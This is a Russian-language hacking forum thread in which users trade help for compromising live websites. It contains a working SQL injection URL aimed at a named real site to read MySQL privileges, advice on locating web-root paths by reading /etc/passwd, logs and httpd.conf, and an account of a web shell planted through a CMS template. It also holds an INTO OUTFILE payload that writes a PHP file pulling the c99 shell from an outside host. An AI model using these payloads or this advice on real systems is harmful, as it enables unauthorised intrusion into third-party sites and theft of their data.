Залил шелл через админку кмс (засунул шелл в шаблон) захожу на него все ок - шелл полностью работает. дальше заливаю шелл отдельно от шаблона, файл залился НО, при заходе на него вылазит ошибка 500 ( Premature end of script headers: в error.log ) и так на все новые залитые .php файлы, если залить .txt все ок (пробывал чтобы пхп обрабатывал тхт как скрипт, проблема остается). Пробывал менять chmod (0777/0755/0700) результата 0. т.е. править скрипты можно, но заливать скрипты чтобы они выполнялись нет. дело явно не в содержании шелла, если вписать 123 и назвать файл asd.php он всеравно выдаст ошибку. все остальные файлы в директории (которые были до меня) выполняются отлично, если отредактировать один из такхи файлов то тоже все работает, но нужно именно залить отдельно шелл. safe mode выключен, все папки открыты на запись, вобщем свиду все нормально... система freebsd помогите, не знаю что и думать
В .htaccess ничего нету кроме AddDeafultCharset UTF-8 // мда.. сломал сайт вобщем, подожду пока админы поправят чтобы еще попробывать что-нибудь...
подскажите, как вывести file_priv? пробую http://www.newhorizons.com.ua/news_detail.php?id=-100+union+select+1,2,file_priv,4,5,6,7,8+from+mysql.user+where+user=0x755f6e6577686f72697a6f6e-- никак не получаетса
с чего ты решил что у тебя доступ к ней? http://www.newhorizons.com.ua/news_detail.php?id=-100+union+select+1,2,3,4,5,6,7,8+from+mysql.user--+
почти всегда есть файл phpinfo.php в корневой директории пма (если админ не удалил,то оно там лежит по дефолту) http://site.com/phpmyadmin/phpinfo.php
какая там версия ПМА ? пробуйте раскрытие путей из этой темы http://forum.antichat.net/thread50669.html если есть привилегии чтения/запись файлов для твоего пользователя mysql, пробуй читать лог файлы
почти такой же вопрос. как узнать путь для заливки шелла (/home/www/img/shell.php),если ошибки в основном вида Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 10000' at line 1 . Права file_priv есть
Версия MySQL-клиента: 5.0.51a при раскрытии любых указаных путей в той теме отображается пустая страница даже без ошибки сайт с инклудом ../../../../var/www/default/mysql_data.php пробовал SELECT '<? @include("http://xxx.ru/c99.txt"); ?>' into outfile '/var/www/tmp/c99.php'
Несколько вариантов: 1) Просканить сканером директорий с целью найти phpinfo или файл который открыть по прямому пути выдает ошибку. 2) Вставить спецсимволы в сесии\куки в надежде, что они не проверяються и ошибки не выключены. Выведет ошибку с путем. 3) Раз уж есть file_priv, то читайте /etc/passwd. Найти там путь возможно. Или найти access_log (error_log), там тоже могут быть пути, и если пути такого плана: /usr/sitename.ru/www то просто вставить вместо sitename.ru доменное имя уязвимого сайта. Или опять же проскать через load_file в поисках httpd.conf, там есть деректива, в которой указан путь обычно или виртуальный хост хотя бы. 4) Поиск вывода ошибок на соседних сайтах найденных через Reverse IP. Если путь вида, в котором учавствует доменное имя, то включаем логику Если же путь типа /usr/user100500/www то пробовать по-другому найти. Но раз уж есть file_priv, то через /etc/passwd возможно найти путь
я не вандал, только в учебных целях) залил я шелл таким образом SELECT '<? @include("http://xxx.ru/c99.txt"); ?>' into outfile '/tmp/c99.php' как теперь в него зайти
